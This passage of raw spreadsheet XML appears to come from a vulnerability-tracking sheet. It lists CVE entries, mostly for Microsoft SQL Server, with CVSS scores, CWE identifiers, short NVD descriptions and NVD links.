s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q105" s="5" t="inlineStr" /><c r="R105" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S105" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t></is></c></row><row r="106"><c r="A106" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B106" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C106" s="5" t="inlineStr"><is><t>CVE-2026-49882</t></is></c><c r="D106" s="5" t="n"><v>8.800000000000001</v></c><c r="E106" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F106" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G106" s="5" t="inlineStr" /><c r="H106" s="5" t="n"><v>0.003</v></c><c r="I106" s="5" t="inlineStr" /><c r="J106" s="5" t="inlineStr" /><c r="K106" s="5" t="inlineStr" /><c r="L106" s="5" t="inlineStr" /><c r="M106" s="5" t="inlineStr" /><c r="N106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O106" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P106" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q106" s="5" t="inlineStr" /><c r="R106" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S106" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t></is></c></row><row r="107"><c r="A107" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B107" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C107" s="5" t="inlineStr"><is><t>CVE-2026-62706</t></is></c><c r="D107" s="5" t="n"><v>8.800000000000001</v></c><c r="E107" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F107" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G107" s="5" t="inlineStr" /><c r="H107" s="5" t="n"><v>0.006</v></c><c r="I107" s="5" t="inlineStr" /><c r="J107" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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7" s="5" t="inlineStr" /><c r="M107" s="5" t="inlineStr" /><c r="N107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O107" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P107" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q107" s="5" t="inlineStr" /><c r="R107" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S107" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t></is></c></row><row r="108"><c r="A108" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C108" s="5" t="inlineStr"><is><t>CVE-2026-62744</t></is></c><c r="D108" s="5" t="n"><v>8.800000000000001</v></c><c r="E108" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F108" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G108" s="5" t="inlineStr" /><c r="H108" s="5" t="n"><v>0.008</v></c><c r="I108" s="5" t="inlineStr" /><c r="J108" s="5" t="inlineStr" /><c r="K108" s="5" t="inlineStr" /><c r="L108" s="5" t="inlineStr" /><c r="M108" s="5" t="inlineStr" /><c r="N108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P108" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q108" s="5" t="inlineStr" /><c r="R108" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S108" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t></is></c></row><row r="109"><c r="A109" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C109" s="5" t="inlineStr"><is><t>CVE-2026-62895</t></is></c><c r="D109" s="5" t="n"><v>8.800000000000001</v></c><c r="E109" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F109" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G109" s="5" t="inlineStr" /><c r="H109" s="5" t="n"><v>0.007</v></c><c r="I109" s="5" t="inlineStr" /><c r="J109" s="5" t="inlineStr" /><c r="K109" s="5" t="inlineStr" /><c r="L109" s="5" t="inlineStr" /><c r="M109" s="5" t="inlineStr" /><c r="N109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P109" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q109" s="5" t="inlineStr" /><c r="R109" s="5" t="inlineStr"><is><t>CWE-1390, CWE-89, CWE-942</t></is></c><c r="S109" s="5" t="inlineStr"><is><t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t></is></c></row><row r="110"><c r="A110" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B110" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C110" s="5" t="inlineStr"><is><t>CVE-2026-65772</t></is></c><c r="D110" s="5" t="n"><v>8.800000000000001</v></c><c r="E110" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F110" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G110" s="5" t="inlineStr" /><c r="H110" s="5" t="n"><v>0.008999999999999999</v></c><c r="I110" s="5" t="inlineStr" /><c r="J110" s="5" t="inlineStr" /><c r="K110" s="5" t="inlineStr" /><c r="L110" s="5" t="inlineStr" /><c r="M110" s="5" t="inlineStr" /><c r="N110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O110" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P110" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q110" s="5" t="inlineStr" /><c r="R110" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S110" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="T110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t></is></c></row><row r="111"><c r="A111" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C111" s="5" t="inlineStr"><is><t>CVE-2026-66814</t></is></c><c r="D111" s="5" t="n"><v>8.800000000000001</v></c><c r="E111" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F111" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G111" s="5" t="inlineStr" /><c r="H111" s="5" t="n"><v>0.004</v></c><c r="I111" s="5" t="inlineStr" /><c r="J111" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K111" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L111" s="5" t="inlineStr" /><c r="M111" s="5" t="inlineStr" /><c r="N111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P111" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q111" s="5" t="inlineStr" /><c r="R111" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S111" s="5" t="inlineStr"><is><t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t></is></c></row><row r="112"><c r="A112" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B112" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C112" s="5" t="inlineStr"><is><t>CVE-2026-66818</t></is></c><c r="D112" s="5" t="n"><v>8.800000000000001</v></c><c r="E112" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F112" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G112" s="5" t="inlineStr" /><c r="H112" s="5" t="n"><v>0.006</v></c><c r="I112" s="5" t="inlineStr" /><c r="J112" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K112" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L112" s="5" t="inlineStr" /><c r="M112" s="5" t="inlineStr" /><c r="N112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O112" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P112" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q112" s="5" t="inlineStr" /><c r="R112" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S112" s="5" t="inlineStr"><is><t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t></is></c></row><row r="113"><c r="A113" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B113" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C113" s="5" t="inlineStr"><is><t>CVE-2026-66819</t></is></c><c r="D113" s="5" t="n"><v>8.800000000000001</v></c><c r="E113" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F113" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G113" s="5" t="inlineStr" /><c r="H113" s="5" t="n"><v>0.007</v></c><c r="I113" s="5" t="inlineStr" /><c r="J113" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K113" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L113" s="5" t="inlineStr" /><c r="M113" s="5" t="inlineStr" /><c r="N113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O113" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P113" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q113" s="5" t="inlineStr" /><c r="R113" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S113" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t></is></c></row><row r="114"><c r="A114" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C114" s="5" t="inlineStr"><is><t>CVE-2026-66820</t></is></c><c r="D114" s="5" t="n"><v>8.800000000000001</v></c><c r="E114" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G114" s="5" t="inlineStr" /><c r="H114" s="5" t="n"><v>0.005</v></c><c r="I114" s="5" t="inlineStr" /><c r="J114" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K114" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L114" s="5" t="inlineStr" /><c r="M114" s="5" t="inlineStr" /><c r="N114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P114" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q114" s="5" t="inlineStr" /><c r="R114" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S114" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t></is></c></row><row r="115"><c r="A115" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C115" s="5" t="inlineStr"><is><t>CVE-2026-67368</t></is></c><c r="D115" s="5" t="n"><v>8.800000000000001</v></c><c r="E115" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G115" s="5" t="inlineStr" /><c r="H115" s="5" t="n"><v>0.007</v></c><c r="I115" s="5" t="inlineStr" /><c r="J115" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K115" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L115" s="5" t="inlineStr" /><c r="M115" s="5" t="inlineStr" /><c r="N115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P115" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q115" s="5" t="inlineStr" /><c r="R115" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S115" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t></is></c></row><row r="116"><c r="A116" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C116" s="5" t="inlineStr"><is><t>CVE-2026-67370</t></is></c><c r="D116" s="5" t="n"><v>8.800000000000001</v></c><c r="E116" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G116" s="5" t="inlineStr" /><c r="H116" s="5" t="n"><v>0.007</v></c><c r="I116" s="5" t="inlineStr" /><c r="J116" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K116" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L116" s="5" t="inlineStr" /><c r="M116" s="5" t="inlineStr" /><c r="N116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P116" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q116" s="5" t="inlineStr" /><c r="R116" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S116" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t></is></c></row><row r="117"><c r="A117" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C117" s="5" t="inlineStr"><is><t>CVE-2026-67373</t></is></c><c r="D117" s="5" t="n"><v>8.800000000000001</v></c><c r="E117" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G117" s="5" t="inlineStr" /><c r="H117" s="5" t="n"><v>0.006</v></c><c r="I117" s="5" t="inlineStr" /><c r="J117" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K117" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L117" s="5" t="inlineStr" /><c r="M117" s="5" t="inlineStr" /><c r="N117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P117" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q117" s="5" t="inlineStr" /><c r="R117" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S117" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t></is></c></row><row r="118"><c r="A118" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C118" s="5" t="inlineStr"><is><t>CVE-2026-67380</t></is></c><c r="D118" s="5" t="n"><v>8.800000000000001</v></c><c r="E118" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G118" s="5" t="inlineStr" /><c r="H118" s="5" t="n"><v>0.007</v></c><c r="I118" s="5" t="inlineStr" /><c r="J118" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K118" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L118" s="5" t="inlineStr" /><c r="M118" s="5" t="inlineStr" /><c r="N118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P118" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q118" s="5" t="inlineStr" /><c r="R118" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S118" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t></is></c></row><row r="119"><c r="A119" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C119" s="5" t="inlineStr"><is><t>CVE-2026-67381</t></is></c><c r="D119" s="5" t="n"><v>8.800000000000001</v></c><c r="E119" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G119" s="5" t="inlineStr" /><c r="H119" s="5" t="n"><v>0.005</v></c><c r="I119" s="5" t="inlineStr" /><c r="J119" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K119" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L119" s="5" t="inlineStr" /><c r="M119" s="5" t="inlineStr" /><c r="N119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P119" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q119" s="5" t="inlineStr" /><c r="R119" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S119" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t></is></c></row><row r="120"><c r="A120" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C120" s="5" t="inlineStr"><is><t>CVE-2026-67384</t></is></c><c r="D120" s="5" t="n"><v>8.800000000000001</v></c><c r="E120" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G120" s="5" t="inlineStr" /><c r="H120" s="5" t="n"><v>0.006</v></c><c r="I120" s="5" t="inlineStr" /><c r="J120" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K120" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L120" s="5" t="inlineStr" /><c r="M120" s="5" t="inlineStr" /><c r="N120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P120" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q120" s="5" t="inlineStr" /><c r="R120" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S120" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t></is></c></row><row r="121"><c r="A121" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C121" s="5" t="inlineStr"><is><t>CVE-2026-67385</t></is></c><c r="D121" s="5" t="n"><v>8.800000000000001</v></c><c r="E121" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G121" s="5" t="inlineStr" /><c r="H121" s="5" t="n"><v>0.005</v></c><c r="I121" s="5" t="inlineStr" /><c r="J121" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K121" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L121" s="5" t="inlineStr" /><c r="M121" s="5" t="inlineStr" /><c r="N121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P121" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q121" s="5" t="inlineStr" /><c r="R121" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S121" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t></is></c></row><row r="122"><c r="A122" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C122" s="5" t="inlineStr"><is><t>CVE-2026-67388</t></is></c><c r="D122" s="5" t="n"><v>8.800000000000001</v></c><c r="E122" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G122" s="5" t="inlineStr" /><c r="H122" s="5" t="n"><v>0.005</v></c><c r="I122" s="5" t="inlineStr" /><c r="J122" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K122" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L122" s="5" t="inlineStr" /><c r="M122" s="5" t="inlineStr" /><c r="N122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P122" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q122" s="5" t="inlineStr" /><c r="R122" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S122" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t></is></c></row><row r="123"><c r="A123" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C123" s="5" t="inlineStr"><is><t>CVE-2026-67631</t></is></c><c r="D123" s="5" t="n"><v>8.800000000000001</v></c><c r="E123" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G123" s="5" t="inlineStr" /><c r="H123" s="5" t="n"><v>0.006</v></c><c r="I123" s="5" t="inlineStr" /><c r="J123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L123" s="5" t="inlineStr" /><c r="M123" s="5" t="inlineStr" /><c r="N123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P123" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q123" s="5" t="inlineStr" /><c r="R123" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S123" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t></is></c></row><row r="124"><c r="A124" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C124" s="5" t="inlineStr"><is><t>CVE-2026-67638</t></is></c><c r="D124" s="5" t="n"><v>8.800000000000001</v></c><c r="E124" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G124" s="5" t="inlineStr" /><c r="H124" s="5" t="n"><v>0.007</v></c><c r="I124" s="5" t="inlineStr" /><c r="J124" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K124" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L124" s="5" t="inlineStr" /><c r="M124" s="5" t="inlineStr" /><c r="N124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P124" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q124" s="5" t="inlineStr" /><c r="R124" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S124" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t></is></c></row><row r="125"><c r="A125" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C125" s="5" t="inlineStr"><is><t>CVE-2026-67639</t></is></c><c r="D125" s="5" t="n"><v>8.800000000000001</v></c><c r="E125" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F125" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G125" s="5" t="inlineStr" /><c r="H125" s="5" t="n"><v>0.007</v></c><c r="I125" s="5" t="inlineStr" /><c r="J125" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K125" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L125" s="5" t="inlineStr" /><c r="M125" s="5" t="inlineStr" /><c r="N125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P125" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q125" s="5" t="inlineStr" /><c r="R125" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S125" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t></is></c></row><row r="126"><c r="A126" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C126" s="5" t="inlineStr"><is><t>CVE-2026-67642</t></is></c><c r="D126" s="5" t="n"><v>8.800000000000001</v></c><c r="E126" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F126" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G126" s="5" t="inlineStr" /><c r="H126" s="5" t="n"><v>0.005</v></c><c r="I126" s="5" t="inlineStr" /><c r="J126" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K126" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L126" s="5" t="inlineStr" /><c r="M126" s="5" t="inlineStr" /><c r="N126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P126" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q126" s="5" t="inlineStr" /><c r="R126" 